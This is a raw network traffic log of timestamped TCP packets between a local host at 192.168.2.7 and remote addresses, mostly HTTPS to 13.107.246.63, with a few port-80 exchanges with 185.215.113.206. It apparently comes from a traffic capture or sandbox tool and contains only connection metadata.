Dec 7, 2024 12:59:32.595958948 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.596168995 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.596487999 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.596499920 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.600200891 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.600275040 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.600383997 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.600790977 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.600812912 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.600826025 CET	49761	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.600832939 CET	443	49761	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.637881041 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.637916088 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.638067007 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.638746023 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.638761997 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.639652967 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.639714956 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.640096903 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.640131950 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.640614033 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.640619040 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.641128063 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.641139984 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.641630888 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.641638994 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.790857077 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.790934086 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.791058064 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.794939041 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.794962883 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.794976950 CET	49762	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.794984102 CET	443	49762	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.837796926 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.837843895 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:32.837948084 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.841757059 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:32.841773033 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.074089050 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.074151993 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.074228048 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.078464985 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.079329014 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.079345942 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.079358101 CET	49763	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.079363108 CET	443	49763	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.079838991 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.080555916 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.086767912 CET	49677	443	192.168.2.7	20.50.201.200
Dec 7, 2024 12:59:33.093272924 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.093272924 CET	49764	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.093302011 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.093313932 CET	443	49764	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.309443951 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.309499979 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.309592962 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.322814941 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.322830915 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.354412079 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.354464054 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.354573011 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.357808113 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:33.357824087 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:33.554456949 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:33.555217028 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:34.441632032 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.446559906 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.446572065 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.448086023 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.448090076 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.463763952 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.466945887 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.466959000 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.468168974 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.468175888 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.659918070 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.667841911 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.667870045 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.668396950 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.668406010 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.876806021 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.876888037 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.876945972 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.877168894 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.877188921 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.877207994 CET	49765	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.877213955 CET	443	49765	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.880374908 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.880410910 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.880501032 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.880676031 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.880687952 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.898262024 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.898330927 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.898395061 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.898678064 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.898678064 CET	49766	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.898694038 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.898700953 CET	443	49766	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.901832104 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.901880980 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:34.902132034 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.902267933 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:34.902282953 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.050052881 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.050645113 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.050668955 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.051155090 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.051161051 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.094784021 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.094870090 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.094917059 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.095102072 CET	49767	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.095120907 CET	443	49767	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.098364115 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.098400116 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.098561049 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.098733902 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.098750114 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.109978914 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.110399008 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.110431910 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.110871077 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.110878944 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.484683037 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.484761000 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.484978914 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.485008001 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.485023975 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.485034943 CET	49768	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.485040903 CET	443	49768	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.488173962 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.488200903 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.488286018 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.488449097 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.488461018 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.545459032 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.545531988 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.545671940 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.545706987 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.545706987 CET	49769	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.545723915 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.545732975 CET	443	49769	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.548780918 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.548810959 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:35.549117088 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.549117088 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:35.549154043 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.642064095 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.643585920 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.658813000 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.658849001 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.677273035 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.677283049 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.696202040 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.704575062 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.704586983 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.725143909 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.725167990 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.841041088 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.883673906 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.923799038 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.923810959 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:36.934324980 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:36.934330940 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.077323914 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.077394962 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.078152895 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.078229904 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.078284025 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.078321934 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.188591957 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.188611984 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.188622952 CET	49770	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.188630104 CET	443	49770	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.190989017 CET	49771	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.191004038 CET	443	49771	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.219696999 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.230407000 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.230427980 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.230494976 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.274319887 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.276153088 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.276170969 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.276245117 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.280397892 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.280472994 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.280524015 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.288692951 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.295885086 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.295917988 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.296776056 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.296782017 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.297405005 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.297413111 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.297971010 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.297979116 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.298130989 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.298155069 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.298213005 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.298228979 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.298549891 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.298556089 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.298567057 CET	49772	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.298571110 CET	443	49772	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.349370956 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.349401951 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.349493980 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.353380919 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.353394032 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.655049086 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.655122042 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.655215025 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.655467987 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.655479908 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.655488968 CET	49774	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.655494928 CET	443	49774	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.658551931 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.658570051 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.658663988 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.658828974 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.658838987 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.729264021 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.729342937 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.729406118 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.729595900 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.729609013 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.729619980 CET	49775	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.729625940 CET	443	49775	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.732867956 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.732899904 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:37.732985973 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.733171940 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:37.733186960 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.013200998 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.013860941 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.013883114 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.014338970 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.014344931 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.021078110 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.021410942 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.021439075 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.021734953 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.021739960 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.068995953 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.069583893 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.069613934 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.070162058 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.070168018 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.428744078 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.429286957 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.429308891 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.429804087 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.429816008 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.447757006 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.447833061 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.447894096 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.448337078 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.448360920 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.448373079 CET	49776	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.448379040 CET	443	49776	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.452210903 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.452255964 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.452326059 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.452497959 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.452512026 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.456341982 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.456406116 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.456454039 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.456576109 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.456590891 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.456602097 CET	49777	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.456607103 CET	443	49777	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.458574057 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.458614111 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.458688974 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.458794117 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.458802938 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.478871107 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.479309082 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.479335070 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.479790926 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.479799986 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.504004955 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.504070044 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.504122972 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.504218102 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.504234076 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.504245043 CET	49779	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.504250050 CET	443	49779	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.506202936 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.506234884 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.506311893 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.506444931 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.506458998 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.864731073 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.864789963 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.864850998 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.865102053 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.865115881 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.865128994 CET	49780	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.865135908 CET	443	49780	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.868390083 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.868405104 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.868463993 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.868638039 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.868644953 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.913933039 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.913996935 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.914056063 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.914295912 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.914309025 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.914318085 CET	49781	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.914323092 CET	443	49781	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.917232990 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.917272091 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:39.917332888 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.917490005 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:39.917505026 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.168709993 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.169384956 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.169410944 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.169940948 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.169945955 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.174137115 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.174418926 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.174443960 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.174767017 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.174772024 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.221149921 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.221620083 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.221647024 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.222071886 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.222079992 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.419914961 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.420495987 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.420526981 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.421042919 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.421047926 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.426026106 CET	49743	80	192.168.2.7	185.215.113.206
